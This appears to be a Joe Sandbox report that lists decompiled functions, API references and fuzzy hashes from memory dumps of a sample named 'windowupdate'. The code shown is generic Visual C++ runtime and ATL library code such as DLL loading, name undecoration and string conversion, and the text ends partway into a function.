                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Window$Visible
                      • String ID: %ls$::IsWindow(m_hWnd)$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h
                      • API String ID: 3657826678-3692021841
                      • Opcode ID: 92fc7929fd6e1c014888834fdd8e8c0c1057a21f131849caf37b9a94f0906912
                      • Instruction ID: d4d56f90b2b26824ad0cc8bc9cfcf19b1abfc02ff353a829757b61a1770b2870
                      • Opcode Fuzzy Hash: 92fc7929fd6e1c014888834fdd8e8c0c1057a21f131849caf37b9a94f0906912
                      • Instruction Fuzzy Hash: 0FF0F631E513266FD620BB58EC43F9EB378DB06710F500198F809A7342E561DE4046F6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D5B220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 34libraryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D5B220(void* __ecx, WCHAR* _a4) {
				struct HINSTANCE__* _v8;

				_v8 = LoadLibraryExW(_a4, 0, 0x800);
				if(_v8 == 0) {
					if(GetLastError() != 0x57 || E00D92BC0(_a4, L"api-ms-", 7) == 0) {
						return 0;
					} else {
						return LoadLibraryExW(_a4, 0, 0);
					}
				}
				return _v8;
			}




                      0x00d5b235
                      0x00d5b23c
                      0x00d5b24c
                      0x00000000
                      0x00d5b265
                      0x00000000
                      0x00d5b26d
                      0x00d5b24c
                      0x00000000

                      APIs
                      • LoadLibraryExW.KERNEL32(00D5B127,00000000,00000800,?,?,00D5B127,00000000), ref: 00D5B22F
                      • GetLastError.KERNEL32(?,?,00D5B127), ref: 00D5B243
                      • _wcsncmp.LIBCMTD ref: 00D5B259
                      • LoadLibraryExW.KERNEL32(00D5B127,00000000,00000000,?,00D5B127), ref: 00D5B26D
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: LibraryLoad$ErrorLast_wcsncmp
                      • String ID: api-ms-
                      • API String ID: 4169583555-2084034818
                      • Opcode ID: ac18a64b2cac622833a78e6df29dc9ae4604bdbe8cf5e65309dcdc24717c2612
                      • Instruction ID: be3c7f98df7c3fde26f14d639140584eaf95cc8d941f205d4996a6b8bf4122bd
                      • Opcode Fuzzy Hash: ac18a64b2cac622833a78e6df29dc9ae4604bdbe8cf5e65309dcdc24717c2612
                      • Instruction Fuzzy Hash: B0F0BE30A40305FBDF109BA0CC0AFAD77A4EB04712F244414FD04EA280EB71EA048BB8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D537C0 Relevance: 7.7, APIs: 5, Instructions: 159COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D537C0(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v24;
				signed int _v28;
				char _v32;
				char* _v36;
				char _v40;
				char* _v44;
				char _v48;
				char* _v52;
				char _v56;
				char* _v60;
				char _v64;
				char* _v68;
				char _v72;
				char* _v76;
				char _v80;
				char* _v84;
				char _v88;
				char* _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				intOrPtr _v108;
				char _v112;
				char* _t64;
				intOrPtr _t82;
				char* _t89;
				signed int _t92;

				_t64 =  *0xf20640; // 0x0
				if( *_t64 == 0) {
					E00D4F350(_a4, 1);
					return _a4;
				}
				_t89 =  *0xf20640; // 0x0
				_v16 =  *_t89 - 0x41;
				_t82 =  *0xf20640; // 0x0
				 *0xf20640 = _t82 + 1;
				_v8 = _v16;
				if(_v8 > 0x16) {
					E00D4F350(_a4, 2);
					return _a4;
				}
				E00D4F350( &_v24, 2);
				if(E00D52230( &_v24) == 0) {
					L16:
					E00D4F240(_a4,  &_v24);
					return _a4;
				}
				_v12 = _v8 & 0xfffffffe;
				if(_v12 > 0x16) {
					goto L16;
				}
				_t10 = _v12 + 0xd53a00; // 0xcccccc0a
				_t92 =  *_t10 & 0x000000ff;
				switch( *((intOrPtr*)(_t92 * 4 +  &M00D539D0))) {
					case 0:
						_v32 = E00D50130(_t87, 1);
						_v28 = _t92;
						E00D4F7E0( &_v24,  &_v32);
						goto L16;
					case 1:
						_v40 = E00D50130(__ecx, 2);
						_v36 = __edx;
						__ecx =  &_v40;
						__ecx =  &_v24;
						__eax = E00D4F7E0(__ecx,  &_v40);
						goto L16;
					case 2:
						_v48 = E00D50130(__ecx, 4);
						_v44 = __edx;
						__edx =  &_v48;
						__ecx =  &_v24;
						__eax = E00D4F7E0(__ecx,  &_v48);
						goto L16;
					case 3:
						_v56 = E00D50130(__ecx, 3);
						_v52 = __edx;
						__eax =  &_v56;
						__ecx =  &_v24;
						__eax = E00D4F7E0(__ecx,  &_v56);
						goto L16;
					case 4:
						_v64 = E00D50130(__ecx, 5);
						_v60 = __edx;
						__ecx =  &_v64;
						__ecx =  &_v24;
						__eax = E00D4F7E0(__ecx,  &_v64);
						goto L16;
					case 5:
						_v80 = E00D50130(__ecx, 7);
						_v76 = __edx;
						__eax =  &_v80;
						__ecx =  &_v24;
						__eax = E00D4F7E0(__ecx,  &_v80);
						goto L16;
					case 6:
						_v88 = E00D50130(__ecx, 8);
						_v84 = __edx;
						__ecx =  &_v88;
						__ecx =  &_v24;
						__eax = E00D4F7E0(__ecx,  &_v88);
						goto L16;
					case 7:
						_v72 = E00D50130(__ecx, 6);
						_v68 = __edx;
						__edx =  &_v72;
						__ecx =  &_v24;
						__eax = E00D4F7E0(__ecx,  &_v72);
						goto L16;
					case 8:
						_v96 = E00D50130(__ecx, 9);
						_v92 = __edx;
						__edx =  &_v96;
						__ecx =  &_v24;
						__eax = E00D4F7E0(__ecx,  &_v96);
						goto L16;
					case 9:
						_v104 = E00D50130(__ecx, 0xa);
						_v100 = __edx;
						__eax =  &_v104;
						__ecx =  &_v24;
						__eax = E00D4F7E0(__ecx,  &_v104);
						goto L16;
					case 0xa:
						_v112 = E00D50130(__ecx, 0xb);
						_v108 = __edx;
						__ecx =  &_v112;
						__ecx =  &_v24;
						__eax = E00D4F7E0(__ecx,  &_v112);
						goto L16;
					case 0xb:
						goto L16;
				}
			}

































                      0x00d537c6
                      0x00d537d0
                      0x00d539c2
                      0x00000000
                      0x00d539c7
                      0x00d537d6
                      0x00d537e2
                      0x00d537e5
                      0x00d537ee
                      0x00d537f7
                      0x00d537fe
                      0x00d539b1
                      0x00000000
                      0x00d539b6
                      0x00d53809
                      0x00d53815
                      0x00d53999
                      0x00d539a0
                      0x00000000
                      0x00d539a5
                      0x00d53821
                      0x00d53828
                      0x00000000
                      0x00000000
                      0x00d53831
                      0x00d53831
                      0x00d53838
                      0x00000000
                      0x00d53849
                      0x00d5384c
                      0x00d53856
                      0x00000000
                      0x00000000
                      0x00d5386a
                      0x00d5386d
                      0x00d53870
                      0x00d53874
                      0x00d53877
                      0x00000000
                      0x00000000
                      0x00d5388b
                      0x00d5388e
                      0x00d53891
                      0x00d53895
                      0x00d53898
                      0x00000000
                      0x00000000
                      0x00d538ac
                      0x00d538af
                      0x00d538b2
                      0x00d538b6
                      0x00d538b9
                      0x00000000
                      0x00000000
                      0x00d538cd
                      0x00d538d0
                      0x00d538d3
                      0x00d538d7
                      0x00d538da
                      0x00000000
                      0x00000000
                      0x00d5390f
                      0x00d53912
                      0x00d53915
                      0x00d53919
                      0x00d5391c
                      0x00000000
                      0x00000000
                      0x00d5392d
                      0x00d53930
                      0x00d53933
                      0x00d53937
                      0x00d5393a
                      0x00000000
                      0x00000000
                      0x00d538ee
                      0x00d538f1
                      0x00d538f4
                      0x00d538f8
                      0x00d538fb
                      0x00000000
                      0x00000000
                      0x00d5394b
                      0x00d5394e
                      0x00d53951
                      0x00d53955
                      0x00d53958
                      0x00000000
                      0x00000000
                      0x00d53969
                      0x00d5396c
                      0x00d5396f
                      0x00d53973
                      0x00d53976
                      0x00000000
                      0x00000000
                      0x00d53987
                      0x00d5398a
                      0x00d5398d
                      0x00d53991
                      0x00d53994
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      • UnDecorator::doMSKeywords.LIBCMTD ref: 00D5380E
                      • Mailbox.LIBCMTD ref: 00D539A0
                      • DName::DName.LIBVCRUNTIMED ref: 00D53809
                        • Part of subcall function 00D4F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 00D4F3AE
                      • DName::DName.LIBVCRUNTIMED ref: 00D539B1
                      • DName::DName.LIBVCRUNTIMED ref: 00D539C2
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Name$Name::$Decorator::doKeywordsMailboxNode::makeStatus
                      • String ID:
                      • API String ID: 2417761376-0
                      • Opcode ID: 5b70051300babbb170745039f8f3e0857179313e25eba4d8aa9b056db4fe2de5
                      • Instruction ID: 6ffa9a7aadea3d1eaa0433a079c8dca6b907dbcd233299f0d035d0ba0520a631
                      • Opcode Fuzzy Hash: 5b70051300babbb170745039f8f3e0857179313e25eba4d8aa9b056db4fe2de5
                      • Instruction Fuzzy Hash: 935112F6C002099BDF05DFE4D8529ED7BB4EF54341F14412AED0A6A191EA746B08CF72
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D599E0 Relevance: 7.6, APIs: 5, Instructions: 116COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 97%
                      			E00D599E0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4, intOrPtr _a8) {
				signed char _v5;
				char _v6;
				void* _v12;
				char* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v32;
				char _v40;
				char _v48;
				char* _t97;
				intOrPtr _t98;

				_v24 = __ecx;
				E00D4F3F0( &_v32);
				E00D5A860(__ebx, __edi, __esi,  &_v40);
				if(E00D5AB70( &_v40) != 3) {
					if(E00D5AB70( &_v40) == 2) {
						L5:
						_v5 = 0;
						_push(_v5 & 0x000000ff);
						_t98 =  *0xf20644; // 0x0
						E00D4F820( &_v32, E00D4E5F0( &_v48, _t98));
						L7:
						if(_a4 == 0) {
							_a8 = E00D5A700( &_v32) + 1;
							_v20 = E00D4F7A0(_a8, 0xf2065c, 1);
							_a4 = _v20;
						}
						if(_a4 == 0) {
							L20:
							return _a4;
						} else {
							E00D57D80( &_v32, _a4, _a8);
							_v12 = _a4;
							_v16 = _v12;
							while( *_v12 != 0) {
								if( *_v12 != 0x20) {
									_v6 =  *_v12;
									_v12 = _v12 + 1;
									 *_v16 = _v6;
									_v16 = _v16 + 1;
									L18:
									continue;
								}
								_v12 = _v12 + 1;
								 *_v16 = 0x20;
								_v16 = _v16 + 1;
								while( *_v12 == 0x20) {
									_v12 = _v12 + 1;
								}
								goto L18;
							}
							 *_v16 =  *_v12;
							goto L20;
						}
					}
					if(E00D52290() != 0) {
						L6:
						E00D4F820( &_v32,  &_v40);
						goto L7;
					}
					_t97 =  *0xf20640; // 0x0
					if( *_t97 == 0) {
						goto L6;
					}
					goto L5;
				}
				return 0;
			}














                      0x00d599e6
                      0x00d599ec
                      0x00d599f5
                      0x00d59a08
                      0x00d59a1e
                      0x00d59a36
                      0x00d59a38
                      0x00d59a3f
                      0x00d59a40
                      0x00d59a53
                      0x00d59a66
                      0x00d59a6a
                      0x00d59a77
                      0x00d59a8d
                      0x00d59a93
                      0x00d59a93
                      0x00d59a9a
                      0x00d59b2f
                      0x00000000
                      0x00d59aa0
                      0x00d59aab
                      0x00d59ab3
                      0x00d59ab9
                      0x00d59abc
                      0x00d59acf
                      0x00d59b06
                      0x00d59b0f
                      0x00d59b18
                      0x00d59b20
                      0x00d59b23
                      0x00000000
                      0x00d59b23
                      0x00d59ad7
                      0x00d59add
                      0x00d59ae6
                      0x00d59ae9
                      0x00d59afa
                      0x00d59afa
                      0x00000000
                      0x00d59aff
                      0x00d59b2d
                      0x00000000
                      0x00d59b2d
                      0x00d59a9a
                      0x00d59a27
                      0x00d59a5a
                      0x00d59a61
                      0x00000000
                      0x00d59a61
                      0x00d59a29
                      0x00d59a34
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d59a34
                      0x00000000

                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D599EC
                        • Part of subcall function 00D5A860: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D5A869
                        • Part of subcall function 00D5A860: UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 00D5A8C6
                        • Part of subcall function 00D5A860: operator+.LIBVCRUNTIMED ref: 00D5A8D7
                        • Part of subcall function 00D5A860: Mailbox.LIBCMTD ref: 00D5A8E3
                        • Part of subcall function 00D5A860: Mailbox.LIBCMTD ref: 00D5A9D5
                      • Mailbox.LIBCMTD ref: 00D59A53
                      • DName::length.LIBVCRUNTIMED ref: 00D59A6F
                      • DName::getString.LIBCMTD ref: 00D59AAB
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Mailbox$Iterator_baseIterator_base::_std::_$DecoratedDecorator::getNameName::getName::lengthStringoperator+
                      • String ID:
                      • API String ID: 245642696-0
                      • Opcode ID: f0eae23b3c0c17c98c275caf576d87408967e2a47a8aacb81850e9bde8f59df6
                      • Instruction ID: 9e122e66827f0546e9806a88290d00476fd32b114c147703c9ebf3ca5c55aa3c
                      • Opcode Fuzzy Hash: f0eae23b3c0c17c98c275caf576d87408967e2a47a8aacb81850e9bde8f59df6
                      • Instruction Fuzzy Hash: 7E416B75D04248EFCF08DFA4D4A19EEBBB1EF55302F288199EC55A7341DA30AA49CB70
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D31AC0 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 80COMMON
                      Download Yara Rule
                      C-Code - Quality: 72%
                      			E00D31AC0(void* __ecx, void* __esi, short* _a4, char* _a8, int _a12, int _a16) {
				intOrPtr _v8;
				short* _t14;
				int _t18;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t32;
				void* _t33;

				_v8 = 0xcccccccc;
				_t35 = _a8;
				if(_a8 == 0) {
					_t22 = L00D84930(_t35, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x234, 0, "%ls", L"lpa != 0");
					_t33 = _t33 + 0x18;
					if(_t22 == 1) {
						asm("int3");
					}
				}
				_t37 = _a4;
				if(_a4 == 0) {
					_t21 = L00D84930(_t37, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x235, 0, "%ls", L"lpw != 0");
					_t33 = _t33 + 0x18;
					if(_t21 == 1) {
						asm("int3");
					}
				}
				if(_a4 == 0 || _a8 == 0) {
					_t14 = 0;
				} else {
					 *_a4 = 0;
					_t18 = MultiByteToWideChar(_a16, 0, _a8, 0xffffffff, _a4, _a12);
					__eflags = _t33 - _t33;
					_v8 = E00DC1520(_t18, _t33 - _t33);
					__eflags = _v8;
					if(__eflags != 0) {
						_t14 = _a4;
					} else {
						__eflags = 0;
						if(0 == 0) {
							_t20 = L00D84930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x23f, 0, "%ls", 0xde40dc);
							_t33 = _t33 + 0x18;
							__eflags = _t20 - 1;
							if(__eflags == 0) {
								asm("int3");
							}
						}
						_t14 = 0;
					}
				}
				return E00DC1520(_t14, _t32 - _t33 + 4);
			}











                      0x00d31ac5
                      0x00d31acc
                      0x00d31ad0
                      0x00d31aea
                      0x00d31aef
                      0x00d31af5
                      0x00d31af7
                      0x00d31af7
                      0x00d31af5
                      0x00d31af8
                      0x00d31afc
                      0x00d31b16
                      0x00d31b1b
                      0x00d31b21
                      0x00d31b23
                      0x00d31b23
                      0x00d31b21
                      0x00d31b28
                      0x00d31b30
                      0x00d31b34
                      0x00d31b39
                      0x00d31b52
                      0x00d31b58
                      0x00d31b5f
                      0x00d31b62
                      0x00d31b66
                      0x00d31b96
                      0x00d31b68
                      0x00d31b68
                      0x00d31b6a
                      0x00d31b84
                      0x00d31b89
                      0x00d31b8c
                      0x00d31b8f
                      0x00d31b91
                      0x00d31b91
                      0x00d31b8f
                      0x00d31b92
                      0x00d31b92
                      0x00d31b66
                      0x00d31ba7

                      APIs
                      • MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,?), ref: 00D31B52
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlconv.h$lpa != 0$lpw != 0
                      • API String ID: 626452242-3592995100
                      • Opcode ID: 690275efcf1a47fdb9b6e8a8fe0873f3c0fe2b872fdf085af57e0bf241359d85
                      • Instruction ID: 4bcef6ac00e0e796113e81e5f7d3e4b7c06d96043cdb81c62397694ad65ef0cb
                      • Opcode Fuzzy Hash: 690275efcf1a47fdb9b6e8a8fe0873f3c0fe2b872fdf085af57e0bf241359d85
                      • Instruction Fuzzy Hash: AE213534E8031ABFDF20FE55EC07FAA73549B25B51F148018FA146A1C1F2B0DA948BB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D552B0 Relevance: 7.6, APIs: 5, Instructions: 52COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D552B0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v32;
				char _v40;
				char _v48;
				char _v56;
				void* _t34;
				void* _t46;
				void* _t47;

				_t47 = __esi;
				_t46 = __edi;
				_t34 = __ebx;
				_v8 = E00D4F7A0(8, 0xf2065c, 0);
				_t52 = _v8;
				if(_v8 == 0) {
					_v12 = 0;
				} else {
					_v12 = E00D4F3F0(_v8);
				}
				_v16 = _v12;
				E00D54380(_t34, _t46, _t47, _t52,  &_v32, _v16);
				_v20 = E00D57D00( &_v40);
				_v24 = E00D4FBB0(_v20,  &_v48, 0x20);
				E00D4F820(_v16, E00D4FB70(_v24,  &_v56, _a8));
				E00D4F240(_a4,  &_v32);
				return _a4;
			}















                      0x00d552b0
                      0x00d552b0
                      0x00d552b0
                      0x00d552c7
                      0x00d552ca
                      0x00d552ce
                      0x00d552dd
                      0x00d552d0
                      0x00d552d8
                      0x00d552d8
                      0x00d552e7
                      0x00d552f2
                      0x00d55306
                      0x00d55317
                      0x00d5532e
                      0x00d5533a
                      0x00d55345

                      APIs
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: MailboxName::operator+$Iterator_baseIterator_base::_std::_
                      • String ID:
                      • API String ID: 2657989147-0
                      • Opcode ID: 833c0e0302178e8135cc2a00c3099550d0fe053c43350d6bcebdba4535a6041c
                      • Instruction ID: 801f7c8bd09281c9eb256a383d522db534658be02a3bcea2f67e24ce49e56b02
                      • Opcode Fuzzy Hash: 833c0e0302178e8135cc2a00c3099550d0fe053c43350d6bcebdba4535a6041c
                      • Instruction Fuzzy Hash: E211F1B5D00108ABDF04EFE4D852AEEB7B9EF44301F108169E915A7291EB706A44CBB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D527C0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D527C0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v12;
				char _v20;
				char* _t13;
				intOrPtr _t22;
				char* _t33;

				_t13 =  *0xf20640; // 0x0
				if( *_t13 != 0) {
					E00D586C0(__ebx, __edi, __esi,  &_v12);
					E00D4FDE0( &_v12, 0x5b);
					E00D4FD40( &_v12, E00D586C0(__ebx, __edi, __esi,  &_v20));
					E00D4FDE0( &_v12, 0x5d);
					_t33 =  *0xf20640; // 0x0
					if( *_t33 != 0x40) {
						E00D4F350(_a4, 2);
						return _a4;
					}
					_t22 =  *0xf20640; // 0x0
					 *0xf20640 = _t22 + 1;
					E00D4F240(_a4,  &_v12);
					return _a4;
				}
				E00D4F350(_a4, 1);
				return _a4;
			}








                      0x00d527c6
                      0x00d527d0
                      0x00d527e5
                      0x00d527f2
                      0x00d52807
                      0x00d52811
                      0x00d52816
                      0x00d52822
                      0x00d52847
                      0x00000000
                      0x00d5284c
                      0x00d52824
                      0x00d5282c
                      0x00d52838
                      0x00000000
                      0x00d5283d
                      0x00d527d7
                      0x00000000

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00D527D7
                        • Part of subcall function 00D4F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 00D4F3AE
                      • DName::operator+=.LIBCMTD ref: 00D527F2
                      • DName::operator+=.LIBCMTD ref: 00D52811
                      • Mailbox.LIBCMTD ref: 00D52838
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: NameName::operator+=$MailboxName::Node::makeStatus
                      • String ID:
                      • API String ID: 3118159130-0
                      • Opcode ID: ed115ff644bdfcbf79e436a8b71564331ab82575bbe57e84408217f91dc1dd53
                      • Instruction ID: 7dda82379a16756777a70b8092f8680b616353a4a66d5c07307499094377452c
                      • Opcode Fuzzy Hash: ed115ff644bdfcbf79e436a8b71564331ab82575bbe57e84408217f91dc1dd53
                      • Instruction Fuzzy Hash: E6118071A00108ABDB14EFA0DC929BE3B74EB51345F044068FC4A5B1A2DF31BA49CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D8C690 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 175timeCOMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 97%
                      			E00D8C690(signed int __ecx, void* __edi) {
				char _v5;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr* _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v68;
				signed int _t83;
				intOrPtr _t90;
				signed int _t102;
				char _t105;
				void* _t112;
				void* _t116;
				void* _t169;
				void* _t170;
				void* _t173;

				_t169 = __edi;
